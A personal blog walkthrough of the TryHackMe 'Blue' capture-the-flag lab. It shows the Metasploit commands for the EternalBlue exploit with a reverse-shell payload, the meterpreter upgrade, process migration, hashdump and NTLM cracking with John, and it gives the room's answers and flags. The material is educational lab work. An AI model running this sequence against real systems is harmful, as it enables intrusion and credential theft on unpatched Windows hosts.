TryHackMe CTF: Blue — Walkthrough

November 29, 2024
Posted in CTF, TryHackMe
November 29, 2024 Jasper

Hi! It is time to look at the Blue CTF on TryHackMe. I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by THMs rooms. Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.

Blue CTF

Room URL: https://tryhackme.com/room/blue


Task 1 (Recon)

Let’s get started with some recon!

Questions

Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room)

Let’s get started with some port scanning with nmap.

nmap -sV -sC --script vuln 10.10.184.191

The -sV flag adds version detection, the -sC flag runs some default scripts, while the -script flag tries to find some vulnerabilities.

Doing some port scanning

There is a lot to look at! We can see a variety of services running: RPC, NetBIOS, SMB, remote access, and RPC. In addition we can see a vulnerability: smb-vuln-ms17–010, with CVE number CVE-2017–0143.

Answer: No answer needed

How many ports are open with a port number under 1000?

Answer: 3

What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08–067)

Answer: ms17–010


Task 2 (Gain Access)

Exploit the machine and gain a foothold.

Questions

Start Metasploit

Answer: No answer needed

Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

Well, we know the name of the exploit, and we ware search for modules of the type exploit. So we can enter the following command:

search ms17–010 type:exploit
Searching for ms17–010 exploit modules

Considering the name of this room, I will go with the EternalBlue one.

Answer: exploit/windows/smb/ms17_010_eternalblue

Show options and set the one required value. What is the name of this value? (All caps for submission)

This is very often RHOSTS, but let’s have a look. Load the module by entering use 0. Then enter show options.

Loading the ms17_010_eternal blue module and showing options

And yes, RHOSTS, which is the target host ip.

Answer: RHOSTS

Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:

set payload windows/x64/shell/reverse_tcp

Set the payload (see above), and the RHOSTS option to the target machine ip.

With that done, run the exploit!

Simple type run or exploit.

Answer: No answer needed

Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.

We got access:

Gaining access

Background the shell by pressing Control+Z and move on to task 3.

Answer: No answer needed


Task 3 (Escalate)

Escalate privileges, learn how to upgrade shells in metasploit.

Questions

If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

I did a simple search for shell and found the following module:

Searching for the shell_to_meterpreter module

Answer: post/multi/manage/shell_to_meterpreter

Select this (use MODULE_PATH). Show options, what option are we required to change?

Activate the model, and show options.

Showing the options for the shell_to_meterpreter module

The answer is SESSION.

Answer: SESSION

Set the required option, you may need to list all of the sessions to find your target here.

In the above screenshot I used sessions -l to see the id of the shell session. Proceed by setting the SESSION to 1 (set SESSION 1).

Answer: No answer needed

Run! If this doesn’t work, try completing the exploit from the previous task once more.

Run the run command.

Running the shell_to_meterpreter module

Enter the sessions -l command once more to see that we have a active Meterpreter session:

It is running on id 2.

Answer: No answer needed

Once the meterpreter shell conversion completes, select that session for use.

Change sessions by writing sessions -i 2.

Activating the meterpreter session

Answer: No answer needed

Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command ‘shell’ and run ‘whoami’. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.

Let’s run a shell and run whoami. We are indeed system.

Running basic commands

Now background the shell, and select the meterpreter session once more.

Answer: No answer needed

List all of the processes running via the ‘ps’ command. Just because we are system doesn’t mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

Run the ps command.

Looking at the running processes with ps

Pick a system process. I will remember id 2728.

Answer: No answer needed

Migrate to this process using the ‘migrate PROCESS_ID’ command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.

Simply enter migrate 2728 (or another id you picked).

Migrating to a system process

Migration completed!

Answer: No answer needed


Task 4 (Cracking)

Dump the non-default user’s password and crack it!

Questions

Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Now that we have our elevated shell, run hashdump.

Running hashdump

In case you are wondering, the hashdump ouput follows the following format:

  1. Username (Administrator, User1, etc.) 
  2. Relative Identification (RID)
  3. LM hash 
  4. NTLM hash

The non-default user is Jon.

Answer: Jon

Copy this password hash to a file and research how to crack it. What is the cracked password?

Copy the hash (ffb43f0de35be4d9917ac0cc8ad57f8d) to a file by running:

echo 'ffb43f0de35be4d9917ac0cc8ad57f8d' > hash.txt

Let’s use John the Ripper to crack it. I first thought the format would be LM, but it is actually nt.

john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

This gives us the answer.

Cracking the password hash with john

Answer: alqfna22


Task 5 (Find flags!)

Find the three flags planted on this machine. These are not traditional flags, rather, they’re meant to represent key locations within the Windows system. Use the hints provided below to complete this room!

Completed Blue? Check out Ice: Link

You can check out the third box in this series, Blaster, here: Link

Questions

Flag1? This flag can be found at the system root.

Make sure you are still in the meterpreter session. Check you present working directory by entering pwd, followed by moving up (..) twice. List the files in the current directory (ls or dir) and finally read athe flag by running cat flag1.txt.

Finding the first flag

Answer: flag{access_the_machine}

Flag2? This flag can be found at the location where passwords are stored within Windows.

Errata: Windows really doesn’t like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen.

Windows password are stored hashed within files in the c:\Windows\System32\Config directory. Change your directory to there in the meterpreter shell:

cd C:/Windows/System32/config

List the files there are read the flag2.txt:

Finding the second flag

Answer: flag{sam_database_elevated_access}

flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

I first thought I had to look into the C:/Users/Administrator folder but this does not exist. But Jon is an administrator so let’s look there.

Looking at the users directory

If we list all files in the Jon directory we do not see any flag. Let’s go into the Documents folder. And bingo!

Finding the third flag

Answer: flag{admin_documents_can_be_valuable}


We are done! This was fun, and if you followed along with the Metasploit rooms on TryHackMe (I got walkthroughs for those as well!) it shouldn’t have been to difficult 🙂 If you got some benefit from this walkthrough you are welcome to give me some claps.


Like my articles?

You are welcome to give my article a clap or two 🙂
I would be so grateful if you support me by buying me a cup of coffee:

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:

Leave a Reply

Your email address will not be published. Required fields are marked *